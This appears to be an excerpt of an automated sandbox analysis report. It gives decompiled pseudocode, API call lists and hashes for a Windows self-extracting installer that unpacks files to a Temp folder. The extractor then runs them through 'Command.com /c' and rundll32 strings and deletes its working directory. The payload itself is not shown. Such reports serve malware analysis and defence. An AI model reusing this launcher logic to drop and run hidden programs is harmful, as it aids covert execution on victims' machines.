                                                                        0x00f81e60
                                                                        0x00f81e3e
                                                                        0x00f81e79
                                                                        0x00f81e7b
                                                                        0x00f81e84
                                                                        0x00000000
                                                                        0x00f81d9b
                                                                        0x00f81d9b
                                                                        0x00f81da0
                                                                        0x00f81da2
                                                                        0x00f81da5
                                                                        0x00f81da5
                                                                        0x00f81da7
                                                                        0x00f81da8
                                                                        0x00f81dac
                                                                        0x00f81dae
                                                                        0x00f81db4
                                                                        0x00f81db7
                                                                        0x00f81db7
                                                                        0x00f81db9
                                                                        0x00f81dba
                                                                        0x00f81dbe
                                                                        0x00f81dc3
                                                                        0x00f81dce
                                                                        0x00f81dd2
                                                                        0x00f81deb
                                                                        0x00000000
                                                                        0x00f81df0
                                                                        0x00000000
                                                                        0x00f81dd2
                                                                        0x00f81bf7
                                                                        0x00f81bfe
                                                                        0x00f81c07
                                                                        0x00f81d55
                                                                        0x00f81d5a
                                                                        0x00f81d5b
                                                                        0x00f81d5d
                                                                        0x00f81d5e
                                                                        0x00000000
                                                                        0x00f81c1b
                                                                        0x00f81c1b
                                                                        0x00f81c20
                                                                        0x00f81c2c
                                                                        0x00f81c33
                                                                        0x00f81c38
                                                                        0x00f81c3a
                                                                        0x00f81c3a
                                                                        0x00f81c40
                                                                        0x00f81c4b
                                                                        0x00f81c4b
                                                                        0x00f81c5d
                                                                        0x00f81c61
                                                                        0x00f81dd4
                                                                        0x00f81dd4
                                                                        0x00f81dd6
                                                                        0x00f81ddb
                                                                        0x00f81ddc
                                                                        0x00f81dde
                                                                        0x00f81d64
                                                                        0x00f81d64
                                                                        0x00f81d67
                                                                        0x00f81d6c
                                                                        0x00000000
                                                                        0x00f81c67
                                                                        0x00f81c67
                                                                        0x00f81c6d
                                                                        0x00f81c72
                                                                        0x00f81c74
                                                                        0x00f81c74
                                                                        0x00f81c8e
                                                                        0x00f81c99
                                                                        0x00f81cc0
                                                                        0x00f81cf8
                                                                        0x00f81d07
                                                                        0x00f81d23
                                                                        0x00f81d09
                                                                        0x00f81d14
                                                                        0x00f81d1b
                                                                        0x00f81d1b
                                                                        0x00f81d2b
                                                                        0x00f81d2d
                                                                        0x00f81d2d
                                                                        0x00f81d38
                                                                        0x00f81d39
                                                                        0x00f81d46
                                                                        0x00f81cc2
                                                                        0x00f81cc2
                                                                        0x00f81ccc
                                                                        0x00f81cce
                                                                        0x00f81cce
                                                                        0x00f81cdb
                                                                        0x00f81ce6
                                                                        0x00f81cee
                                                                        0x00f81cee
                                                                        0x00f81e89
                                                                        0x00f81e91
                                                                        0x00f81e92
                                                                        0x00f81e94
                                                                        0x00f81e97
                                                                        0x00f81ea4
                                                                        0x00f81ea4
                                                                        0x00f81c61
                                                                        0x00f81c07
                                                                        0x00f81bd3
                                                                        0x00f81b7b

                                                                        APIs
                                                                        • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81BE7
                                                                        • GetFileAttributesA.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81BFE
                                                                        • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\,?,?,00000000,00000001,00000000), ref: 00F81C57
                                                                        • GetPrivateProfileIntA.KERNEL32 ref: 00F81C88
                                                                        • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00F81140,00000000,00000008,?), ref: 00F81CB8
                                                                        • GetShortPathNameA.KERNEL32 ref: 00F81D1B
                                                                          • Part of subcall function 00F844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00F84518
                                                                          • Part of subcall function 00F844B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 00F84554
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                        • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                        • API String ID: 383838535-3964152161
                                                                        • Opcode ID: b4df5650c66f4f732930e2488c914acf66414070d98e684b096a5600e56da6d3
                                                                        • Instruction ID: 66f4a994bea8bdc0173ff2bc56a85e3c9b5e05fac5a9d721caae0b54b5a0c35c
                                                                        • Opcode Fuzzy Hash: b4df5650c66f4f732930e2488c914acf66414070d98e684b096a5600e56da6d3
                                                                        • Instruction Fuzzy Hash: EAA13871E002185BEB20BB24CC49BFA776DFB81320F144795E555A32D1EBB49E87EB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 406 f82f1d-f82f3d 407 f82f6c-f82f73 call f85164 406->407 408 f82f3f-f82f46 406->408 416 f82f79-f82f80 call f855a0 407->416 417 f83041 407->417 410 f82f48 call f851e5 408->410 411 f82f5f-f82f66 call f83a3f 408->411 418 f82f4d-f82f4f 410->418 411->407 411->417 416->417 424 f82f86-f82fbe GetSystemDirectoryA call f8658a LoadLibraryA 416->424 420 f83043-f83053 call f86ce0 417->420 418->417 421 f82f55-f82f5d 418->421 421->407 421->411 428 f82fc0-f82fd4 GetProcAddress 424->428 429 f82ff7-f83004 FreeLibrary 424->429 428->429 432 f82fd6-f82fee DecryptFileA 428->432 430 f83006-f8300c 429->430 431 f83017-f83024 SetCurrentDirectoryA 429->431 430->431 433 f8300e call f8621e 430->433 434 f83054-f8305a 431->434 435 f83026-f8303c call f844b9 call f86285 431->435 432->429 446 f82ff0-f82ff5 432->446 444 f83013-f83015 433->444 436 f8305c call f83b26 434->436 437 f83065-f8306c 434->437 435->417 447 f83061-f83063 436->447 442 f8307c-f83089 437->442 443 f8306e-f83075 call f8256d 437->443 449 f8308b-f83091 442->449 450 f830a1-f830a9 442->450 452 f8307a 443->452 444->417 444->431 446->429 447->417 447->437 449->450 453 f83093 call f83ba2 449->453 455 f830ab-f830ad 450->455 456 f830b4-f830b7 450->456 452->442 460 f83098-f8309a 453->460 455->456 458 f830af call f84169 455->458 456->420 458->456 460->417 461 f8309c 460->461 461->450
                                                                        C-Code - Quality: 82%
                                                                        			E00F82F1D(void* __ecx, int __edx) {
                                                                        				signed int _v8;
                                                                        				char _v272;
                                                                        				_Unknown_base(*)()* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t9;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				void* _t14;
                                                                        				int _t21;
                                                                        				signed int _t22;
                                                                        				signed int _t25;
                                                                        				intOrPtr* _t26;
                                                                        				signed int _t27;
                                                                        				void* _t30;
                                                                        				_Unknown_base(*)()* _t31;
                                                                        				void* _t34;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t44;
                                                                        				signed int _t46;
                                                                        				int _t47;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        
                                                                        				_t43 = __edx;
                                                                        				_t9 =  *0xf88004; // 0x7e92e7a6
                                                                        				_v8 = _t9 ^ _t46;
                                                                        				if( *0xf88a38 != 0) {
                                                                        					L5:
                                                                        					_t11 = E00F85164(_t52);
                                                                        					_t53 = _t11;
                                                                        					if(_t11 == 0) {
                                                                        						L16:
                                                                        						_t12 = 0;
                                                                        						L17:
                                                                        						return E00F86CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                        					}
                                                                        					_t14 = E00F855A0(_t53); // executed
                                                                        					if(_t14 == 0) {
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t45 = 0x105;
                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                        						_t43 = 0x105;
                                                                        						_t40 =  &_v272;
                                                                        						E00F8658A( &_v272, 0x105, "advapi32.dll");
                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                        						_t44 = 0;
                                                                        						if(_t36 != 0) {
                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                        							_v276 = _t31;
                                                                        							if(_t31 != 0) {
                                                                        								_t45 = _t47;
                                                                        								_t40 = _t31;
                                                                        								 *0xf8a288("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                        								_v276();
                                                                        								if(_t47 != _t47) {
                                                                        									_t40 = 4;
                                                                        									asm("int 0x29");
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						FreeLibrary(_t36);
                                                                        						_t58 =  *0xf88a24 - _t44; // 0x0
                                                                        						if(_t58 != 0) {
                                                                        							L14:
                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                        							if(_t21 != 0) {
                                                                        								__eflags =  *0xf88a2c - _t44; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									L20:
                                                                        									__eflags =  *0xf88d48 & 0x000000c0;
                                                                        									if(( *0xf88d48 & 0x000000c0) == 0) {
                                                                        										_t41 =  *0xf89a40; // 0x3, executed
                                                                        										_t26 = E00F8256D(_t41); // executed
                                                                        										_t44 = _t26;
                                                                        									}
                                                                        									_t22 =  *0xf88a24; // 0x0
                                                                        									 *0xf89a44 = _t44;
                                                                        									__eflags = _t22;
                                                                        									if(_t22 != 0) {
                                                                        										L26:
                                                                        										__eflags =  *0xf88a38;
                                                                        										if( *0xf88a38 == 0) {
                                                                        											__eflags = _t22;
                                                                        											if(__eflags == 0) {
                                                                        												E00F84169(__eflags);
                                                                        											}
                                                                        										}
                                                                        										_t12 = 1;
                                                                        										goto L17;
                                                                        									} else {
                                                                        										__eflags =  *0xf89a30 - _t22; // 0x0
                                                                        										if(__eflags != 0) {
                                                                        											goto L26;
                                                                        										}
                                                                        										_t25 = E00F83BA2(); // executed
                                                                        										__eflags = _t25;
                                                                        										if(_t25 == 0) {
                                                                        											goto L16;
                                                                        										}
                                                                        										_t22 =  *0xf88a24; // 0x0
                                                                        										goto L26;
                                                                        									}
                                                                        								}
                                                                        								_t27 = E00F83B26(_t40, _t44);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        								goto L20;
                                                                        							}
                                                                        							_t43 = 0x4bc;
                                                                        							E00F844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                        							 *0xf89124 = E00F86285();
                                                                        							goto L16;
                                                                        						}
                                                                        						_t59 =  *0xf89a30 - _t44; // 0x0
                                                                        						if(_t59 != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						_t30 = E00F8621E(); // executed
                                                                        						if(_t30 == 0) {
                                                                        							goto L16;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t49 =  *0xf88a24;
                                                                        				if( *0xf88a24 != 0) {
                                                                        					L4:
                                                                        					_t34 = E00F83A3F(_t51);
                                                                        					_t52 = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				if(E00F851E5(_t49) == 0) {
                                                                        					goto L16;
                                                                        				}
                                                                        				_t51 =  *0xf88a38;
                                                                        				if( *0xf88a38 != 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				goto L4;
                                                                        			}




























                                                                        0x00f82f1d
                                                                        0x00f82f28
                                                                        0x00f82f2f
                                                                        0x00f82f3d
                                                                        0x00f82f6c
                                                                        0x00f82f6c
                                                                        0x00f82f71
                                                                        0x00f82f73
                                                                        0x00f83041
                                                                        0x00f83041
                                                                        0x00f83043
                                                                        0x00f83053
                                                                        0x00f83053
                                                                        0x00f82f79
                                                                        0x00f82f80
                                                                        0x00000000
                                                                        0x00f82f86
                                                                        0x00f82f86
                                                                        0x00f82f93
                                                                        0x00f82f9e
                                                                        0x00f82fa0
                                                                        0x00f82fa6
                                                                        0x00f82fb8
                                                                        0x00f82fba
                                                                        0x00f82fbe
                                                                        0x00f82fc6
                                                                        0x00f82fcc
                                                                        0x00f82fd4
                                                                        0x00f82fd6
                                                                        0x00f82fd8
                                                                        0x00f82fe0
                                                                        0x00f82fe6
                                                                        0x00f82fee
                                                                        0x00f82ff0
                                                                        0x00f82ff5
                                                                        0x00f82ff5
                                                                        0x00f82fee
                                                                        0x00f82fd4
                                                                        0x00f82ff8
                                                                        0x00f82ffe
                                                                        0x00f83004
                                                                        0x00f83017
                                                                        0x00f8301c
                                                                        0x00f83024
                                                                        0x00f83054
                                                                        0x00f8305a
                                                                        0x00f83065
                                                                        0x00f83065
                                                                        0x00f8306c
                                                                        0x00f8306e
                                                                        0x00f83075
                                                                        0x00f8307a
                                                                        0x00f8307a
                                                                        0x00f8307c
                                                                        0x00f83081
                                                                        0x00f83087
                                                                        0x00f83089
                                                                        0x00f830a1
                                                                        0x00f830a1
                                                                        0x00f830a9
                                                                        0x00f830ab
                                                                        0x00f830ad
                                                                        0x00f830af
                                                                        0x00f830af
                                                                        0x00f830ad
                                                                        0x00f830b6
                                                                        0x00000000
                                                                        0x00f8308b
                                                                        0x00f8308b
                                                                        0x00f83091
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83093
                                                                        0x00f83098
                                                                        0x00f8309a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8309c
                                                                        0x00000000
                                                                        0x00f8309c
                                                                        0x00f83089
                                                                        0x00f8305c
                                                                        0x00f83061
                                                                        0x00f83063
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83063
                                                                        0x00f8302b
                                                                        0x00f83032
                                                                        0x00f8303c
                                                                        0x00000000
                                                                        0x00f8303c
                                                                        0x00f83006
                                                                        0x00f8300c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f8300e
                                                                        0x00f83015
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f83015
                                                                        0x00f82f80
                                                                        0x00f82f3f
                                                                        0x00f82f46
                                                                        0x00f82f5f
                                                                        0x00f82f5f
                                                                        0x00f82f64
                                                                        0x00f82f66
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82f66
                                                                        0x00f82f4f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82f55
                                                                        0x00f82f5d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F82F93
                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00F82FB2
                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00F82FC6
                                                                        • DecryptFileA.ADVAPI32 ref: 00F82FE6
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F82FF8
                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F8301C
                                                                          • Part of subcall function 00F851E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F82F4D,?,00000002,00000000), ref: 00F85201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                        • API String ID: 2126469477-1230860006
                                                                        • Opcode ID: bcbccdad3ed7132603c9194ae5d319402f439655927c5c6351db533c50700f03
                                                                        • Instruction ID: f20763a2e5a02874e9fa1203687ee84706cf32ad9a8377525767a4db6e61fc56
                                                                        • Opcode Fuzzy Hash: bcbccdad3ed7132603c9194ae5d319402f439655927c5c6351db533c50700f03
                                                                        • Instruction Fuzzy Hash: 0341AB31E006095BDB34BB719C496FA33A8EB44F69F040566E941C21A1EF7CDE81FB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 86%
                                                                        			E00F82390(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				char _v284;
                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t21;
                                                                        				int _t36;
                                                                        				void* _t46;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        				CHAR* _t65;
                                                                        				void* _t66;
                                                                        				signed int _t67;
                                                                        				signed int _t69;
                                                                        
                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                        				_t21 =  *0xf88004; // 0x7e92e7a6
                                                                        				_t22 = _t21 ^ _t69;
                                                                        				_v8 = _t21 ^ _t69;
                                                                        				_t65 = __ecx;
                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                        					L10:
                                                                        					_pop(_t62);
                                                                        					_pop(_t66);
                                                                        					_pop(_t46);
                                                                        					return E00F86CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                        				} else {
                                                                        					E00F81680( &_v276, 0x104, __ecx);
                                                                        					_t58 = 0x104;
                                                                        					E00F816B3( &_v280, 0x104, "*");
                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                        					_t63 = _t22;
                                                                        					if(_t63 == 0xffffffff) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        					do {
                                                                        						L3:
                                                                        						_t58 = 0x104;
                                                                        						E00F81680( &_v276, 0x104, _t65);
                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                        							_t58 = 0x104;
                                                                        							E00F816B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                        							DeleteFileA( &_v280);
                                                                        						} else {
                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                        								E00F816B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                        								_t58 = 0x104;
                                                                        								E00F8658A( &_v280, 0x104, 0xf81140);
                                                                        								E00F82390( &_v284);
                                                                        							}
                                                                        						}
                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                        					} while (_t36 != 0);
                                                                        					FindClose(_t63); // executed
                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                        					goto L10;
                                                                        				}
                                                                        			}





















                                                                        0x00f82398
                                                                        0x00f8239e
                                                                        0x00f823a3
                                                                        0x00f823a5
                                                                        0x00f823ae
                                                                        0x00f823b3
                                                                        0x00f824cb
                                                                        0x00f824d2
                                                                        0x00f824d3
                                                                        0x00f824d4
                                                                        0x00f824df
                                                                        0x00f823c2
                                                                        0x00f823d1
                                                                        0x00f823db
                                                                        0x00f823e4
                                                                        0x00f823f6
                                                                        0x00f823fc
                                                                        0x00f82401
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f82407
                                                                        0x00f82407
                                                                        0x00f82408
                                                                        0x00f82411
                                                                        0x00f8241f
                                                                        0x00f8247a
                                                                        0x00f82483
                                                                        0x00f82495
                                                                        0x00f824a3
                                                                        0x00f82421
                                                                        0x00f8242f
                                                                        0x00f82453
                                                                        0x00f8245d
                                                                        0x00f82466
                                                                        0x00f82472
                                                                        0x00f82472
                                                                        0x00f8242f
                                                                        0x00f824af
                                                                        0x00f824b5
                                                                        0x00f824be
                                                                        0x00f824c5
                                                                        0x00000000
                                                                        0x00f824c5

                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(?,00F88A3A,00F811F4,00F88A3A,00000000,?,?), ref: 00F823F6
                                                                        • lstrcmpA.KERNEL32(?,00F811F8), ref: 00F82427
                                                                        • lstrcmpA.KERNEL32(?,00F811FC), ref: 00F8243B
                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00F82495
                                                                        • DeleteFileA.KERNEL32(?), ref: 00F824A3
                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00F824AF
                                                                        • FindClose.KERNELBASE(00000000), ref: 00F824BE
                                                                        • RemoveDirectoryA.KERNELBASE(00F88A3A), ref: 00F824C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                        • String ID:
                                                                        • API String ID: 836429354-0
                                                                        • Opcode ID: c979d330c0667f11ab6b97c9f76434d2536325f44af3740a3f5e5eec8b0b8bdb
                                                                        • Instruction ID: a9554f6427ecacb57b66aa92150df3aed3f9a059f18b6fa2a678f031dde96c8e
                                                                        • Opcode Fuzzy Hash: c979d330c0667f11ab6b97c9f76434d2536325f44af3740a3f5e5eec8b0b8bdb
                                                                        • Instruction Fuzzy Hash: 5C31A4326046449BD320FB64CC8DAFB73ACFBC4315F044A2EB59586191EB38A90DE762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E00F82BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long _t4;
                                                                        				void* _t6;
                                                                        				intOrPtr _t7;
                                                                        				void* _t9;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				intOrPtr* _t17;
                                                                        				signed char _t19;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t22;
                                                                        				void* _t24;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t4 = GetVersion();
                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                        					if(_t12 != 0) {
                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                        						if(_t21 != 0) {
                                                                        							_t17 = _t21;
                                                                        							 *0xf8a288(0, 1, 0, 0);
                                                                        							 *_t21();
                                                                        							_t29 = _t24 - _t24;
                                                                        							if(_t24 != _t24) {
                                                                        								_t17 = 4;
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t20 = _a12;
                                                                        				_t18 = _a4;
                                                                        				 *0xf89124 = 0;
                                                                        				if(E00F82CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                        					_t9 = E00F82F1D(_t18, _t20); // executed
                                                                        					_t22 = _t9; // executed
                                                                        					E00F852B6(0, _t18, _t21, _t22); // executed
                                                                        					if(_t22 != 0) {
                                                                        						_t32 =  *0xf88a3a; // 0x0
                                                                        						if(_t32 == 0) {
                                                                        							_t19 =  *0xf89a2c; // 0x0
                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                        								E00F81F90(_t19, _t21, _t22);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t6 =  *0xf88588; // 0x0
                                                                        				if(_t6 != 0) {
                                                                        					CloseHandle(_t6);
                                                                        				}
                                                                        				_t7 =  *0xf89124; // 0x0
                                                                        				return _t7;
                                                                        			}


















                                                                        0x00f82c03
                                                                        0x00f82c0d
                                                                        0x00f82c18
                                                                        0x00f82c20
                                                                        0x00f82c2e
                                                                        0x00f82c32
                                                                        0x00f82c36
                                                                        0x00f82c3d
                                                                        0x00f82c43
                                                                        0x00f82c45
                                                                        0x00f82c47
                                                                        0x00f82c49
                                                                        0x00f82c4e
                                                                        0x00f82c4e
                                                                        0x00f82c47
                                                                        0x00f82c32
                                                                        0x00f82c20
                                                                        0x00f82c50
                                                                        0x00f82c54
                                                                        0x00f82c57
                                                                        0x00f82c64
                                                                        0x00f82c66
                                                                        0x00f82c6b
                                                                        0x00f82c6d
                                                                        0x00f82c74
                                                                        0x00f82c76
                                                                        0x00f82c7c
                                                                        0x00f82c7e
                                                                        0x00f82c87
                                                                        0x00f82c89
                                                                        0x00f82c89
                                                                        0x00f82c87
                                                                        0x00f82c7c
                                                                        0x00f82c74
                                                                        0x00f82c8e
                                                                        0x00f82c95
                                                                        0x00f82c98
                                                                        0x00f82c98
                                                                        0x00f82c9e
                                                                        0x00f82ca7

                                                                        APIs
                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C03
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C18
                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00F82C28
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                        • API String ID: 62482547-3460614246
                                                                        • Opcode ID: f107ff75c3fb92ed1015a97dd0e6639845a99575e0eff3b8fdd9f94bdbfc6152
                                                                        • Instruction ID: 52c38db67b8fd60d8f09db365db038afa0e25b4986ac1d98230e9f705d5bcd45
                                                                        • Opcode Fuzzy Hash: f107ff75c3fb92ed1015a97dd0e6639845a99575e0eff3b8fdd9f94bdbfc6152
                                                                        • Instruction Fuzzy Hash: BF11C271B00209ABD7607BB4AD89AFF3799EB857B0B480116F901D3290DA34EC02B761
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F86F40() {
                                                                        
                                                                        				SetUnhandledExceptionFilter(E00F86EF0); // executed
                                                                        				return 0;
                                                                        			}



                                                                        0x00f86f45
                                                                        0x00f86f4d

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00F86F45
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.394128458.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                        • Associated: 00000001.00000002.394122906.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394137580.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.394145109.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f80000_brJg.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
